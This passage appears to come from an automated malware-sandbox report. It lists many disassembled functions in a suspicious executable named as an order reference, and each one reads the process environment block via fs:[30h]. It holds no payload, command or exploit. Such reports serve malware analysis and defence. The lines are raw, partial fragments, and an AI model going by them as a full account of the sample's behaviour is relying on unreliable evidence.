                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C61C3 mov eax, dword ptr fs:[00000030h]5_2_019C61C3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C61C3 mov eax, dword ptr fs:[00000030h]5_2_019C61C3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019301F8 mov eax, dword ptr fs:[00000030h]5_2_019301F8
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D61E5 mov eax, dword ptr fs:[00000030h]5_2_019D61E5
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AA118 mov ecx, dword ptr fs:[00000030h]5_2_019AA118
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AA118 mov eax, dword ptr fs:[00000030h]5_2_019AA118
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AA118 mov eax, dword ptr fs:[00000030h]5_2_019AA118
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AA118 mov eax, dword ptr fs:[00000030h]5_2_019AA118
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C0115 mov eax, dword ptr fs:[00000030h]5_2_019C0115
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AE10E mov eax, dword ptr fs:[00000030h]5_2_019AE10E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AE10E mov ecx, dword ptr fs:[00000030h]5_2_019AE10E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AE10E mov eax, dword ptr fs:[00000030h]5_2_019AE10E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AE10E mov eax, dword ptr fs:[00000030h]5_2_019AE10E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AE10E mov ecx, dword ptr fs:[00000030h]5_2_019AE10E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AE10E mov eax, dword ptr fs:[00000030h]5_2_019AE10E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AE10E mov eax, dword ptr fs:[00000030h]5_2_019AE10E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AE10E mov ecx, dword ptr fs:[00000030h]5_2_019AE10E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AE10E mov eax, dword ptr fs:[00000030h]5_2_019AE10E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AE10E mov ecx, dword ptr fs:[00000030h]5_2_019AE10E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01930124 mov eax, dword ptr fs:[00000030h]5_2_01930124
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01998158 mov eax, dword ptr fs:[00000030h]5_2_01998158
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01906154 mov eax, dword ptr fs:[00000030h]5_2_01906154
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01906154 mov eax, dword ptr fs:[00000030h]5_2_01906154
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FC156 mov eax, dword ptr fs:[00000030h]5_2_018FC156
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01994144 mov eax, dword ptr fs:[00000030h]5_2_01994144
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01994144 mov eax, dword ptr fs:[00000030h]5_2_01994144
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01994144 mov ecx, dword ptr fs:[00000030h]5_2_01994144
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01994144 mov eax, dword ptr fs:[00000030h]5_2_01994144
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01994144 mov eax, dword ptr fs:[00000030h]5_2_01994144
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4164 mov eax, dword ptr fs:[00000030h]5_2_019D4164
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4164 mov eax, dword ptr fs:[00000030h]5_2_019D4164
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190208A mov eax, dword ptr fs:[00000030h]5_2_0190208A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C60B8 mov eax, dword ptr fs:[00000030h]5_2_019C60B8
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C60B8 mov ecx, dword ptr fs:[00000030h]5_2_019C60B8
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018F80A0 mov eax, dword ptr fs:[00000030h]5_2_018F80A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019980A8 mov eax, dword ptr fs:[00000030h]5_2_019980A8
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019820DE mov eax, dword ptr fs:[00000030h]5_2_019820DE
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019420F0 mov ecx, dword ptr fs:[00000030h]5_2_019420F0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FA0E3 mov ecx, dword ptr fs:[00000030h]5_2_018FA0E3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019860E0 mov eax, dword ptr fs:[00000030h]5_2_019860E0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019080E9 mov eax, dword ptr fs:[00000030h]5_2_019080E9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FC0F0 mov eax, dword ptr fs:[00000030h]5_2_018FC0F0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191E016 mov eax, dword ptr fs:[00000030h]5_2_0191E016
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191E016 mov eax, dword ptr fs:[00000030h]5_2_0191E016
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191E016 mov eax, dword ptr fs:[00000030h]5_2_0191E016
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191E016 mov eax, dword ptr fs:[00000030h]5_2_0191E016
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01984000 mov ecx, dword ptr fs:[00000030h]5_2_01984000
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A2000 mov eax, dword ptr fs:[00000030h]5_2_019A2000
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A2000 mov eax, dword ptr fs:[00000030h]5_2_019A2000
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A2000 mov eax, dword ptr fs:[00000030h]5_2_019A2000
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A2000 mov eax, dword ptr fs:[00000030h]5_2_019A2000
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A2000 mov eax, dword ptr fs:[00000030h]5_2_019A2000
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A2000 mov eax, dword ptr fs:[00000030h]5_2_019A2000
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A2000 mov eax, dword ptr fs:[00000030h]5_2_019A2000
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A2000 mov eax, dword ptr fs:[00000030h]5_2_019A2000
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01996030 mov eax, dword ptr fs:[00000030h]5_2_01996030
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FA020 mov eax, dword ptr fs:[00000030h]5_2_018FA020
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FC020 mov eax, dword ptr fs:[00000030h]5_2_018FC020
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01902050 mov eax, dword ptr fs:[00000030h]5_2_01902050
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01986050 mov eax, dword ptr fs:[00000030h]5_2_01986050
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192C073 mov eax, dword ptr fs:[00000030h]5_2_0192C073
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FE388 mov eax, dword ptr fs:[00000030h]5_2_018FE388
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FE388 mov eax, dword ptr fs:[00000030h]5_2_018FE388
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FE388 mov eax, dword ptr fs:[00000030h]5_2_018FE388
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018F8397 mov eax, dword ptr fs:[00000030h]5_2_018F8397
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018F8397 mov eax, dword ptr fs:[00000030h]5_2_018F8397
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018F8397 mov eax, dword ptr fs:[00000030h]5_2_018F8397
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192438F mov eax, dword ptr fs:[00000030h]5_2_0192438F
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192438F mov eax, dword ptr fs:[00000030h]5_2_0192438F
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AE3DB mov eax, dword ptr fs:[00000030h]5_2_019AE3DB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AE3DB mov eax, dword ptr fs:[00000030h]5_2_019AE3DB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AE3DB mov ecx, dword ptr fs:[00000030h]5_2_019AE3DB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AE3DB mov eax, dword ptr fs:[00000030h]5_2_019AE3DB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A43D4 mov eax, dword ptr fs:[00000030h]5_2_019A43D4
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A43D4 mov eax, dword ptr fs:[00000030h]5_2_019A43D4
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A3C0 mov eax, dword ptr fs:[00000030h]5_2_0190A3C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A3C0 mov eax, dword ptr fs:[00000030h]5_2_0190A3C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A3C0 mov eax, dword ptr fs:[00000030h]5_2_0190A3C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A3C0 mov eax, dword ptr fs:[00000030h]5_2_0190A3C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A3C0 mov eax, dword ptr fs:[00000030h]5_2_0190A3C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A3C0 mov eax, dword ptr fs:[00000030h]5_2_0190A3C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019083C0 mov eax, dword ptr fs:[00000030h]5_2_019083C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019083C0 mov eax, dword ptr fs:[00000030h]5_2_019083C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019083C0 mov eax, dword ptr fs:[00000030h]5_2_019083C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019083C0 mov eax, dword ptr fs:[00000030h]5_2_019083C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019BC3CD mov eax, dword ptr fs:[00000030h]5_2_019BC3CD
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019863C0 mov eax, dword ptr fs:[00000030h]5_2_019863C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191E3F0 mov eax, dword ptr fs:[00000030h]5_2_0191E3F0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191E3F0 mov eax, dword ptr fs:[00000030h]5_2_0191E3F0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191E3F0 mov eax, dword ptr fs:[00000030h]5_2_0191E3F0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019363FF mov eax, dword ptr fs:[00000030h]5_2_019363FF
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019103E9 mov eax, dword ptr fs:[00000030h]5_2_019103E9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019103E9 mov eax, dword ptr fs:[00000030h]5_2_019103E9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019103E9 mov eax, dword ptr fs:[00000030h]5_2_019103E9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019103E9 mov eax, dword ptr fs:[00000030h]5_2_019103E9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019103E9 mov eax, dword ptr fs:[00000030h]5_2_019103E9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019103E9 mov eax, dword ptr fs:[00000030h]5_2_019103E9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019103E9 mov eax, dword ptr fs:[00000030h]5_2_019103E9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019103E9 mov eax, dword ptr fs:[00000030h]5_2_019103E9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01920310 mov ecx, dword ptr fs:[00000030h]5_2_01920310
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A30B mov eax, dword ptr fs:[00000030h]5_2_0193A30B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A30B mov eax, dword ptr fs:[00000030h]5_2_0193A30B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A30B mov eax, dword ptr fs:[00000030h]5_2_0193A30B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FC310 mov ecx, dword ptr fs:[00000030h]5_2_018FC310
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D8324 mov eax, dword ptr fs:[00000030h]5_2_019D8324
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D8324 mov ecx, dword ptr fs:[00000030h]5_2_019D8324
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D8324 mov eax, dword ptr fs:[00000030h]5_2_019D8324
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D8324 mov eax, dword ptr fs:[00000030h]5_2_019D8324
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198035C mov eax, dword ptr fs:[00000030h]5_2_0198035C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198035C mov eax, dword ptr fs:[00000030h]5_2_0198035C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198035C mov eax, dword ptr fs:[00000030h]5_2_0198035C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198035C mov ecx, dword ptr fs:[00000030h]5_2_0198035C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198035C mov eax, dword ptr fs:[00000030h]5_2_0198035C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198035C mov eax, dword ptr fs:[00000030h]5_2_0198035C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A8350 mov ecx, dword ptr fs:[00000030h]5_2_019A8350
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CA352 mov eax, dword ptr fs:[00000030h]5_2_019CA352
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01982349 mov eax, dword ptr fs:[00000030h]5_2_01982349
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01982349 mov eax, dword ptr fs:[00000030h]5_2_01982349
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01982349 mov eax, dword ptr fs:[00000030h]5_2_01982349
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01982349 mov eax, dword ptr fs:[00000030h]5_2_01982349
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01982349 mov eax, dword ptr fs:[00000030h]5_2_01982349
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01982349 mov eax, dword ptr fs:[00000030h]5_2_01982349
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01982349 mov eax, dword ptr fs:[00000030h]5_2_01982349
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01982349 mov eax, dword ptr fs:[00000030h]5_2_01982349
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01982349 mov eax, dword ptr fs:[00000030h]5_2_01982349
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01982349 mov eax, dword ptr fs:[00000030h]5_2_01982349
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01982349 mov eax, dword ptr fs:[00000030h]5_2_01982349
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01982349 mov eax, dword ptr fs:[00000030h]5_2_01982349
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01982349 mov eax, dword ptr fs:[00000030h]5_2_01982349
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01982349 mov eax, dword ptr fs:[00000030h]5_2_01982349
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01982349 mov eax, dword ptr fs:[00000030h]5_2_01982349
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D634F mov eax, dword ptr fs:[00000030h]5_2_019D634F
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A437C mov eax, dword ptr fs:[00000030h]5_2_019A437C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E284 mov eax, dword ptr fs:[00000030h]5_2_0193E284
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E284 mov eax, dword ptr fs:[00000030h]5_2_0193E284
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01980283 mov eax, dword ptr fs:[00000030h]5_2_01980283
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01980283 mov eax, dword ptr fs:[00000030h]5_2_01980283
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01980283 mov eax, dword ptr fs:[00000030h]5_2_01980283
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019962A0 mov eax, dword ptr fs:[00000030h]5_2_019962A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019962A0 mov ecx, dword ptr fs:[00000030h]5_2_019962A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019962A0 mov eax, dword ptr fs:[00000030h]5_2_019962A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019962A0 mov eax, dword ptr fs:[00000030h]5_2_019962A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019962A0 mov eax, dword ptr fs:[00000030h]5_2_019962A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019962A0 mov eax, dword ptr fs:[00000030h]5_2_019962A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D62D6 mov eax, dword ptr fs:[00000030h]5_2_019D62D6
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A2C3 mov eax, dword ptr fs:[00000030h]5_2_0190A2C3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A2C3 mov eax, dword ptr fs:[00000030h]5_2_0190A2C3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A2C3 mov eax, dword ptr fs:[00000030h]5_2_0190A2C3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A2C3 mov eax, dword ptr fs:[00000030h]5_2_0190A2C3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A2C3 mov eax, dword ptr fs:[00000030h]5_2_0190A2C3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019102E1 mov eax, dword ptr fs:[00000030h]5_2_019102E1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019102E1 mov eax, dword ptr fs:[00000030h]5_2_019102E1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019102E1 mov eax, dword ptr fs:[00000030h]5_2_019102E1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018F823B mov eax, dword ptr fs:[00000030h]5_2_018F823B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D625D mov eax, dword ptr fs:[00000030h]5_2_019D625D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01906259 mov eax, dword ptr fs:[00000030h]5_2_01906259
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019BA250 mov eax, dword ptr fs:[00000030h]5_2_019BA250
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019BA250 mov eax, dword ptr fs:[00000030h]5_2_019BA250
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01988243 mov eax, dword ptr fs:[00000030h]5_2_01988243
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01988243 mov ecx, dword ptr fs:[00000030h]5_2_01988243
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FA250 mov eax, dword ptr fs:[00000030h]5_2_018FA250
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018F826B mov eax, dword ptr fs:[00000030h]5_2_018F826B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01904260 mov eax, dword ptr fs:[00000030h]5_2_01904260
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01904260 mov eax, dword ptr fs:[00000030h]5_2_01904260
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01904260 mov eax, dword ptr fs:[00000030h]5_2_01904260
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E59C mov eax, dword ptr fs:[00000030h]5_2_0193E59C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01902582 mov eax, dword ptr fs:[00000030h]5_2_01902582
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01902582 mov ecx, dword ptr fs:[00000030h]5_2_01902582
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01934588 mov eax, dword ptr fs:[00000030h]5_2_01934588
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019245B1 mov eax, dword ptr fs:[00000030h]5_2_019245B1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019245B1 mov eax, dword ptr fs:[00000030h]5_2_019245B1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019805A7 mov eax, dword ptr fs:[00000030h]5_2_019805A7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019805A7 mov eax, dword ptr fs:[00000030h]5_2_019805A7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019805A7 mov eax, dword ptr fs:[00000030h]5_2_019805A7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019065D0 mov eax, dword ptr fs:[00000030h]5_2_019065D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A5D0 mov eax, dword ptr fs:[00000030h]5_2_0193A5D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A5D0 mov eax, dword ptr fs:[00000030h]5_2_0193A5D0
